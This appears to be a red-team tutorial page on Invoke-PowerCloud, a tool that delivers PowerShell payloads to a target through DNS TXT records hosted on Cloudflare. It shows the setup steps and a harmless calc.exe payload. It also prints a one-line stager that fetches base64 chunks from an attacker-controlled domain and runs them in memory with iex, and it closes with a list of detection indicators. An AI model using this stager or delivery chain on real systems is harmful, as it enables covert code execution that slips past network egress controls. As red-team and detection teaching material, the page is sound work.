# Powershell Payload Delivery via DNS using Invoke-PowerCloud

## Credits

Rushing to say that the tool [Invoke-PowerCloud](https://github.com/mantvydasb/powercloud/blob/master/Invoke-PowerCloud.ps1) was heavily inspired by and based on the awesome work that Dominic Chell ([@domchell](https://twitter.com/domchell)) from [MDSec](https://twitter.com/MDSecLabs) had done with [PowerDNS](https://github.com/mdsecactivebreach/PowerDNS) - go follow them and try out the [tool](https://www.mdsec.co.uk/2017/07/powershell-dns-delivery-with-powerdns/) if you are not doing so yet!

Not only that, I want to thank Dominic for taking his time to answer some of my questions regarding the PowerDNS, the setup and helping me troubleshoot it as I was having "some" issues getting the payload delivered to the target from the PowerDNS server.

...which eventually led me to Invoke-PowerCloud, so read on.

## What is Invoke-PowerCloud?

[Invoke-PowerCloud](https://github.com/mantvydasb/powercloud/blob/master/Invoke-PowerCloud.ps1) is a script that allows you to deliver a powershell payload using DNS TXT records to a target in an environment that is egress limited to DNS only.

## How is Invoke-PowerCloud different from PowerDNS?

I assume you have read [PowerShell DNS Delivery with PowerDNS](https://www.mdsec.co.uk/2017/07/powershell-dns-delivery-with-powerdns/) which explains how PowerDNS works.

Invoke-PowerCloud works in a similar fashion, except for a couple of key differences, which may simplify the configuration process of your infrastructure to start delivering paylods via DNS.

**With PowerDNS you need:**

* a dedicated linux box with a public IP where you can run PowerDNS, so it can act as a DNS server
* you also need multiple domain names to get the nameservers configured properly

**With Invoke-PowerCloud you need:**

* a cloudflare.com account
* a domain name whose DNS management is transferred to cloudflare

## Cloudflare? eh?

The way the tool works is by performing the following high level steps:

* Take the powershell payload file and base64 encode it
* Divide the payload into chunks of 255 bytes
* Create a DNS zone file with DNS TXT records representing each chunk of the payload data retrieved from the previous step
* Send the generated DNS zone file to cloudflare using their APIs
* Generate two stagers for use with authoritative NS/non-authoritative NS
* Stager can then be executed on the victim system. The stager will recover the base64 chunks from the DNS TXT records and rebuild the original payload
* Stager executes the payload in memory!

{% hint style="info" %}
If you run the tool again to deliver another payload, the previous DNS TXT records will be deleted
{% endhint %}

## Demo

### One off Configuration

Remember - you need a cloudflare.com account for this to work. Assuming you have that, you need to edit the Invoke-PowerCloud as follows:

1. your cloudflare API key, defined in the variable `$Global:API_KEY`
2. your cloudflare email address, defined in the variable `$Global:EMAIL`

![](https://2061087890-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MTyPaV5dZf-eW1HRanG%2Fsync%2F47332c793ebba1e2fdbf84db5fdede50d83069ca.png?generation=1613807678551463\&alt=media)

### DNS Management

Secondly, you need to move the domain name which you are going to use for payload delivery to cloudflare. In this demo, I will use a domain I own `redteam.me` which is now managed by cloudflare:

![](https://2061087890-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MTyPaV5dZf-eW1HRanG%2Fsync%2F470484ae47c91df5ef028ee4ed1afb0c6e88e29c.png?generation=1613807678620083\&alt=media)

Let's confirm redteam.me DNS is managed by cloudflare by issuing:

```
host -t ns redteam.me
```

![](https://2061087890-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MTyPaV5dZf-eW1HRanG%2Fsync%2F8ef70dc513524414f31974f504f1bc11f0cdb9d4.png?generation=1613807678347992\&alt=media)

### Payload

Let's create a simple payload file - it will print a red message to the screen and open up a calc.exe:

{% code title="payload.txt" %}

```csharp
Write-host -foregroundcolor red "This is our first payload using Invoke-
PowerCloud. As usual, let's pop the calc.exe"; Start-process calc.exe
```

{% endcode %}

### Good to Go

We are now good to go - issue the below on your attacking system:

```csharp
PS C:\tools\powercloud> . .\powercloud.ps1; Invoke-PowerCloud -FilePath .\payload.txt -Domain redteam.me -Verbose
```

The script will generate two stagers. One of them is shown here:

{% code title="attacker\@victim" %}

```csharp
$b64=""; (1..1) | ForEach-Object { $b64+=(nslookup -q=txt "$_.redteam.me")[-1] }; iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($b64 -replace('\t|"',"")))))
```

{% endcode %}

![](https://2061087890-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MTyPaV5dZf-eW1HRanG%2Fsync%2Fc7c586732bd57eaa54f6432d0e7433f86ce1463c.png?generation=1613807678898622\&alt=media)

Let's execute the stager on the victim system to get the payload delivered via DNS:

![](https://2061087890-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MTyPaV5dZf-eW1HRanG%2Fsync%2Fbd23977d3d4176c0d6c8b4877dd9a33a9cbaae68.png?generation=1613807678877029\&alt=media)

### Animated Demo

Everything in action can be seen in the below gif:

![](https://2061087890-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MTyPaV5dZf-eW1HRanG%2Fsync%2Fb56704497cb3244f7ed25964d781cb00024a531a.gif?generation=1613807678546962\&alt=media)

## Is Invoke-PowerCloud better than PowerDNS?

No. It just works slightly differently, but achieves the same end goal. Also note, that Cloudflare API rate limiting applies.

## Detection

Let's deliver a PowerShell empire payload using DNS and see how the system reacts to this:

![](https://2061087890-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MTyPaV5dZf-eW1HRanG%2Fsync%2Fe45bed704258f39a297b1d005e99e0b6f9274036.gif?generation=1613807679357493\&alt=media)

For those wondering about detection possibilities, the following is a list of signs (mix and match) that may qualify the host behaviour as `suspicious` and warrant a further investigation:

* host "suddenly" bursted "many" `DNS TXT` requests to one domain
* DNS queries follow the naming convention of 1, 2, 3, ..., N
* majority of DNS answers contain `TXT Lenght` of `255` (trivial to change/randomize)
* DNS answers are all `TTL = 120` (trivial to change/randomize)
* TXT data in DNS answer has no white spaces (easy to change)
* host suddenly/in a short span of time spawned "many" `nslookup` processes
* has the endpoint changed once the DNS lookups stopped? i.e new processes spawned?

Below is a snippet of the PCAP showing DNS traffic from the above demo - note the TXT Length and the data itself:

![](https://2061087890-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MTyPaV5dZf-eW1HRanG%2Fsync%2F3d38bad2b5aa7dcb676a612d549e4e24e8e387ac.png?generation=1613807678547927\&alt=media)

Spike of `nslookup` for a host in a short amount of time:

![](https://2061087890-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MTyPaV5dZf-eW1HRanG%2Fsync%2F9499dc55541adf6faabb35eced8a808168733e6b.png?generation=1613807678813708\&alt=media)

Below is a sample PCAP for your inspection:

{% file src="<https://2061087890-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MTyPaV5dZf-eW1HRanG%2Fsync%2Fcb23a56c5b70eb2870bf89a20c47720459bd874d.pcapng?generation=1613807679176707&alt=media>" %}
DNS Traffic Packet Trace
{% endfile %}

## Download

You can download or contribute to Invoke-PowerCloud here:

{% embed url="<https://github.com/mantvydasb/powercloud>" %}

## References

{% embed url="<https://github.com/mdsecactivebreach/PowerDNS>" %}

{% embed url="<https://www.mdsec.co.uk/2017/07/powershell-dns-delivery-with-powerdns/>" %}